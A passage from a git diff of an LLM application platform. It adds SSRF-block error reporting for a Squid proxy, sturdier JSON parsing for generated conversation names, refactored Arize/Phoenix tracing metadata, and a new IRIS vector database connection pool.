proxy + if response.status_code in (401, 403): + # Check if this is a Squid SSRF rejection + server_header = response.headers.get("server", "").lower() + via_header = response.headers.get("via", "").lower() + + # Squid typically identifies itself in Server or Via headers + if "squid" in server_header or "squid" in via_header: + raise ToolSSRFError( + f"Access to '{url}' was blocked by SSRF protection. " + f"The URL may point to a private or local network address. " + ) if response.status_code not in STATUS_FORCELIST: return response diff --git a/api/core/llm_generator/llm_generator.py b/api/core/llm_generator/llm_generator.py index 4a577e6c38..b4c3ec1caf 100644 --- a/api/core/llm_generator/llm_generator.py +++ b/api/core/llm_generator/llm_generator.py @@ -72,15 +72,22 @@ class LLMGenerator: prompt_messages=list(prompts), model_parameters={"max_tokens": 500, "temperature": 1}, stream=False ) answer = cast(str, response.message.content) - cleaned_answer = re.sub(r"^.*(\{.*\}).*$", r"\1", answer, flags=re.DOTALL) - if cleaned_answer is None: + if answer is None: return "" try: - result_dict = json.loads(cleaned_answer) - answer = result_dict["Your Output"] + result_dict = json.loads(answer) except json.JSONDecodeError: - logger.exception("Failed to generate name after answer, use query instead") + result_dict = json_repair.loads(answer) + + if not isinstance(result_dict, dict): answer = query + else: + output = result_dict.get("Your Output") + if isinstance(output, str) and output.strip(): + answer = output.strip() + else: + answer = query + name = answer.strip() if len(name) > 75: diff --git a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py index 347992fa0d..a7b73e032e 100644 --- a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py +++ b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py @@ -6,7 +6,13 @@ from datetime import datetime, timedelta from typing import Any, Union, cast from urllib.parse import urlparse -from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes +from openinference.semconv.trace import ( + MessageAttributes, + OpenInferenceMimeTypeValues, + OpenInferenceSpanKindValues, + SpanAttributes, + ToolCallAttributes, +) from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk @@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra def datetime_to_nanos(dt: datetime | None) -> int: - """Convert datetime to nanoseconds since epoch. If None, use current time.""" + """Convert datetime to nanoseconds since epoch for Arize/Phoenix.""" if dt is None: dt = datetime.now() return int(dt.timestamp() * 1_000_000_000) def error_to_string(error: Exception | str | None) -> str: - """Convert an error to a string with traceback information.""" + """Convert an error to a string with traceback information for Arize/Phoenix.""" error_message = "Empty Stack Trace" if error: if isinstance(error, Exception): @@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str: def set_span_status(current_span: Span, error: Exception | str | None = None): - """Set the status of the current span based on the presence of an error.""" + """Set the status of the current span based on the presence of an error for Arize/Phoenix.""" if error: error_string = error_to_string(error) current_span.set_status(Status(StatusCode.ERROR, error_string)) @@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None): def safe_json_dumps(obj: Any) -> str: - """A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded.""" + """A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix.""" return json.dumps(obj, default=str, ensure_ascii=False) +def wrap_span_metadata(metadata, **kwargs): + """Add common metatada to all trace entity types for Arize/Phoenix.""" + metadata["created_from"] = "Dify" + metadata.update(kwargs) + return metadata + + class ArizePhoenixDataTrace(BaseTraceInstance): def __init__( self, @@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise def workflow_trace(self, trace_info: WorkflowTraceInfo): - workflow_metadata = { - "workflow_run_id": trace_info.workflow_run_id or "", - "message_id": trace_info.message_id or "", - "workflow_app_log_id": trace_info.workflow_app_log_id or "", - "status": trace_info.workflow_run_status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - } - workflow_metadata.update(trace_info.metadata) + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] + + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.workflow_run_status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="workflow", + conversation_id=trace_info.conversation_id or "", + workflow_app_log_id=trace_info.workflow_app_log_id or "", + workflow_id=trace_info.workflow_id or "", + tenant_id=trace_info.tenant_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0, + workflow_run_version=trace_info.workflow_run_version or "", + total_tokens=trace_info.total_tokens or 0, + file_list=safe_json_dumps(file_list), + query=trace_info.query or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id self.ensure_root_span(dify_trace_id) @@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): workflow_span = self.tracer.start_span( name=TraceTaskName.WORKFLOW_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), @@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance): "app_id": app_id, "app_name": node_execution.title, "status": node_execution.status, + "status_message": node_execution.error or "", "level": "ERROR" if node_execution.status == "failed" else "DEFAULT", } ) @@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance): node_span = self.tracer.start_span( name=node_execution.node_type, attributes={ + SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value), SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value), SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, - SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.METADATA: safe_json_dumps(node_metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, @@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def message_trace(self, trace_info: MessageTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.") return - file_list = cast(list[str], trace_info.file_list) or [] + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] message_file_data: MessageFile | None = trace_info.message_file_data if message_file_data is not None: file_url = f"{self.file_base_url}/{message_file_data.url}" if message_file_data else "" file_list.append(file_url) - message_metadata = { - "message_id": trace_info.message_id or "", - "conversation_mode": str(trace_info.conversation_mode or ""), - "user_id": trace_info.message_data.from_account_id or "", - "file_list": json.dumps(file_list), - "status": trace_info.message_data.status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - "prompt_tokens": trace_info.message_tokens or 0, - "completion_tokens": trace_info.answer_tokens or 0, - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - message_metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="message", + conversation_model=trace_info.conversation_model or "", + message_tokens=trace_info.message_tokens or 0, + answer_tokens=trace_info.answer_tokens or 0, + total_tokens=trace_info.total_tokens or 0, + conversation_mode=trace_info.conversation_mode or "", + gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0, + llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0, + is_streaming_request=trace_info.is_streaming_request or False, + user_id=trace_info.message_data.from_account_id or "", + file_list=safe_json_dumps(file_list), + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) # Add end user data if available if trace_info.message_data.from_end_user_id: @@ -370,14 +404,16 @@ class ArizePhoenixDataTrace(BaseTraceInstance): db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first() ) if end_user_data is not None: - message_metadata["end_user_id"] = end_user_data.session_id + metadata["end_user_id"] = end_user_data.session_id attributes = { - SpanAttributes.INPUT_VALUE: trace_info.message_data.query, - SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.INPUT_VALUE: trace_info.message_data.query, + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } dify_trace_id = trace_info.trace_id or trace_info.message_id @@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance): try: # Convert outputs to string based on type + outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value if isinstance(trace_info.outputs, dict | list): - outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False) + outputs_str = safe_json_dumps(trace_info.outputs) + outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value elif isinstance(trace_info.outputs, str): outputs_str = trace_info.outputs else: @@ -402,10 +440,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): llm_attributes = { SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value, - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: outputs_str, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } llm_attributes.update(self._construct_llm_attributes(trace_info.inputs)) if trace_info.total_tokens is not None and trace_info.total_tokens > 0: @@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def moderation_trace(self, trace_info: ModerationTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_name": "moderation", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="moderation", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.MODERATION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps( + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps( { - "action": trace_info.action, "flagged": trace_info.flagged, + "action": trace_info.action, "preset_response": trace_info.preset_response, - "inputs": trace_info.inputs, - }, - ensure_ascii=False, + "query": trace_info.query, + } ), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "suggested_question", - "status": trace_info.status, - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens, - "ls_provider": trace_info.model_provider or "", - "ls_model_name": trace_info.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.status or "", + status_message=trace_info.status_message or "", + level=trace_info.level or "", + trace_entity_type="suggested_question", + total_tokens=trace_info.total_tokens or 0, + from_account_id=trace_info.from_account_id or "", + agent_based=trace_info.agent_based or False, + from_source=trace_info.from_source or "", + model_provider=trace_info.model_provider or "", + model_id=trace_info.model_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -518,10 +569,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.suggested_question, ensure_ascii=False), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, @@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "dataset_retrieval", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="dataset_retrieval", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -560,20 +615,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.DATASET_RETRIEVAL_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps({"documents": trace_info.documents}, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.RETRIEVER.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - "start_time": start_time.isoformat() if start_time else "", - "end_time": end_time.isoformat() if end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps({"documents": trace_info.documents}), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, ) try: - if trace_info.message_data.error: - set_span_status(span, trace_info.message_data.error) + if trace_info.error: + set_span_status(span, trace_info.error) else: set_span_status(span) finally: @@ -584,30 +639,34 @@ class ArizePhoenixDataTrace(BaseTraceInstance): logger.warning("[Arize/Phoenix] Message data is None, skipping tool trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_config": json.dumps(trace_info.tool_config, ensure_ascii=False), - } + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="tool", + tool_config=safe_json_dumps(trace_info.tool_config), + time_cost=trace_info.time_cost or 0, + file_url=trace_info.file_url or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) root_span_context = self.propagator.extract(carrier=self.carrier) - tool_params_str = ( - json.dumps(trace_info.tool_parameters, ensure_ascii=False) - if isinstance(trace_info.tool_parameters, dict) - else str(trace_info.tool_parameters) - ) - span = self.tracer.start_span( name=trace_info.tool_name, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.tool_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.tool_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: trace_info.tool_outputs, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.TOOL_NAME: trace_info.tool_name, - SpanAttributes.TOOL_PARAMETERS: tool_params_str, + SpanAttributes.TOOL_PARAMETERS: safe_json_dumps(trace_info.tool_parameters), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -623,16 +682,22 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def generate_name_trace(self, trace_info: GenerateNameTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping generate name trace.") return - metadata = { - "project_name": self.project, - "message_id": trace_info.message_id, - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="generate_name", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + conversation_id=trace_info.conversation_id or "", + tenant_id=trace_info.tenant_id, + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.conversation_id self.ensure_root_span(dify_trace_id) @@ -641,13 +706,13 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.GENERATE_NAME_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, - "start_time": trace_info.start_time.isoformat() if trace_info.start_time else "", - "end_time": trace_info.end_time.isoformat() if trace_info.end_time else "", + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -688,32 +753,85 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise ValueError(f"[Arize/Phoenix] API check failed: {str(e)}") def get_project_url(self): + """Build a redirect URL that forwards the user to the correct project for Arize/Phoenix.""" try: - if self.arize_phoenix_config.endpoint == "https://otlp.arize.com": - return "https://app.arize.com/" - else: - return f"{self.arize_phoenix_config.endpoint}/projects/" + project_name = self.arize_phoenix_config.project + endpoint = self.arize_phoenix_config.endpoint.rstrip("/") + + # Arize + if isinstance(self.arize_phoenix_config, ArizeConfig): + return f"https://app.arize.com/?redirect_project_name={project_name}" + + # Phoenix + return f"{endpoint}/projects/?redirect_project_name={project_name}" + except Exception as e: - logger.info("[Arize/Phoenix] Get run url failed: %s", str(e), exc_info=True) - raise ValueError(f"[Arize/Phoenix] Get run url failed: {str(e)}") + logger.info("[Arize/Phoenix] Failed to construct project URL: %s", str(e), exc_info=True) + raise ValueError(f"[Arize/Phoenix] Failed to construct project URL: {str(e)}") def _construct_llm_attributes(self, prompts: dict | list | str | None) -> dict[str, str]: - """Helper method to construct LLM attributes with passed prompts.""" - attributes = {} + """Construct LLM attributes with passed prompts for Arize/Phoenix.""" + attributes: dict[str, str] = {} + + def set_attribute(path: str, value: object) -> None: + """Store an attribute safely as a string.""" + if value is None: + return + try: + if isinstance(value, (dict, list)): + value = safe_json_dumps(value) + attributes[path] = str(value) + except Exception: + attributes[path] = str(value) + + def set_message_attribute(message_index: int, key: str, value: object) -> None: + path = f"{SpanAttributes.LLM_INPUT_MESSAGES}.{message_index}.{key}" + set_attribute(path, value) + + def set_tool_call_attributes(message_index: int, tool_index: int, tool_call: dict | object | None) -> None: + """Extract and assign tool call details safely.""" + if not tool_call: + return + + def safe_get(obj, key, default=None): + if isinstance(obj, dict): + return obj.get(key, default) + return getattr(obj, key, default) + + function_obj = safe_get(tool_call, "function", {}) + function_name = safe_get(function_obj, "name", "") + function_args = safe_get(function_obj, "arguments", {}) + call_id = safe_get(tool_call, "id", "") + + base_path = ( + f"{SpanAttributes.LLM_INPUT_MESSAGES}." + f"{message_index}.{MessageAttributes.MESSAGE_TOOL_CALLS}.{tool_index}" + ) + + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_NAME}", function_name) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_FUNCTION_ARGUMENTS_JSON}", function_args) + set_attribute(f"{base_path}.{ToolCallAttributes.TOOL_CALL_ID}", call_id) + + # Handle list of messages if isinstance(prompts, list): - for i, msg in enumerate(prompts): - if isinstance(msg, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.content"] = msg.get("text", "") - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.{i}.message.role"] = msg.get("role", "user") - # todo: handle assistant and tool role messages, as they don't always - # have a text field, but may have a tool_calls field instead - # e.g. 'tool_calls': [{'id': '98af3a29-b066-45a5-b4b1-46c74ddafc58', - # 'type': 'function', 'function': {'name': 'current_time', 'arguments': '{}'}}]} - elif isinstance(prompts, dict): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = json.dumps(prompts) - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" - elif isinstance(prompts, str): - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.content"] = prompts - attributes[f"{SpanAttributes.LLM_INPUT_MESSAGES}.0.message.role"] = "user" + for message_index, message in enumerate(prompts): + if not isinstance(message, dict): + continue + + role = message.get("role", "user") + content = message.get("text") or message.get("content") or "" + + set_message_attribute(message_index, MessageAttributes.MESSAGE_ROLE, role) + set_message_attribute(message_index, MessageAttributes.MESSAGE_CONTENT, content) + + tool_calls = message.get("tool_calls") or [] + if isinstance(tool_calls, list): + for tool_index, tool_call in enumerate(tool_calls): + set_tool_call_attributes(message_index, tool_index, tool_call) + + # Handle single dict or plain string prompt + elif isinstance(prompts, (dict, str)): + set_message_attribute(0, MessageAttributes.MESSAGE_CONTENT, prompts) + set_message_attribute(0, MessageAttributes.MESSAGE_ROLE, "user") return attributes diff --git a/api/core/rag/datasource/vdb/iris/__init__.py b/api/core/rag/datasource/vdb/iris/__init__.py new file mode 100644 index 0000000000..e69de29bb2 diff --git a/api/core/rag/datasource/vdb/iris/iris_vector.py b/api/core/rag/datasource/vdb/iris/iris_vector.py new file mode 100644 index 0000000000..b1bfabb76e --- /dev/null +++ b/api/core/rag/datasource/vdb/iris/iris_vector.py @@ -0,0 +1,407 @@ +"""InterSystems IRIS vector database implementation for Dify. + +This module provides vector storage and retrieval using IRIS native VECTOR type +with HNSW indexing for efficient similarity search. +""" + +from __future__ import annotations + +import json +import logging +import threading +import uuid +from contextlib import contextmanager +from typing import TYPE_CHECKING, Any + +from configs import dify_config +from configs.middleware.vdb.iris_config import IrisVectorConfig +from core.rag.datasource.vdb.vector_base import BaseVector +from core.rag.datasource.vdb.vector_factory import AbstractVectorFactory +from core.rag.datasource.vdb.vector_type import VectorType +from core.rag.embedding.embedding_base import Embeddings +from core.rag.models.document import Document +from extensions.ext_redis import redis_client +from models.dataset import Dataset + +if TYPE_CHECKING: + import iris +else: + try: + import iris + except ImportError: + iris = None # type: ignore[assignment] + +logger = logging.getLogger(__name__) + +# Singleton connection pool to minimize IRIS license usage +_pool_lock = threading.Lock() +_pool_instance: IrisConnectionPool | None = None + + +def get_iris_pool(config: IrisVectorConfig) -> IrisConnectionPool: + """Get or create the global IRIS connection pool (singleton pattern).""" + global _pool_instance # pylint: disable=global-statement + with _pool_lock: + if _pool_instance is None: + logger.info("Initializing IRIS connection pool") + _pool_instance = IrisConnectionPool(config) + return _pool_instance + + +class IrisConnectionPool: + """Thread-safe connection pool for IRIS database.""" + + def __init__(self, config: IrisVectorConfig) -> None: + self.config = config + self._pool: list[Any] = [] + self._lock = threading.Lock() + self._min_size = config.IRIS_MIN_CONNECTION + self._max_size = config.IRIS_MAX_CONNECTION + self._in_use = 0 + self._schemas_initialized: set[str] = set() # Cache for initialized schemas + self._initialize_pool() + + def _initialize_pool(self) -> None: + for _ in range(self._min_size): + self._pool.append(self._create_connection()) + + def _create_connection(self) -> Any: + return iris.connect( + hostname=self.config.IRIS_HOST, + port=self.config.IRIS_SUPER_SERVER_PORT, + namespace=self.config.IRIS_DATABASE, + username=self.config.IRIS_USER, + password=self.config.IRIS_PASSWORD, + ) + + def get_connection(self) -> Any: + """Get a connection from pool or create new if available.""" + with self._lock: + if self._pool: + conn = self._pool.pop() + self._in_use += 1 + return conn + if self._in_use < self._max_size: + conn = self._create_connection() + self._in_use += 1 + return conn + raise RuntimeError("Connection pool exhausted") + + def return_connection(self, conn: Any) -> None: + """Return connection to pool after validating it.""" + if not conn: + return + + # Validate connection health + is_valid = False + try: + cursor = conn.cursor() + cursor.execute("SELECT 1") + cursor.close() + is_valid = True + except (OSError, RuntimeError) as e: + logger.debug("Connection validation failed: %s", e) + try: + conn.close() + except (OSError, RuntimeError): + pass + + with self._lock: + self._pool.append(conn if is_valid else self._create_connection()) + self._in_use -= 1 + + def ensure_schema_exists(self, schema: str) -> None: + """Ensure schema exists in IRIS database. + + This method is idempotent and thread-safe. It uses a memory cache to avoid + redundant database queries for already-verified schemas. + + Args: + schema: Schema name to ensure exists + + Raises: + Exception: If schema creation fails + """ + # Fast path: check 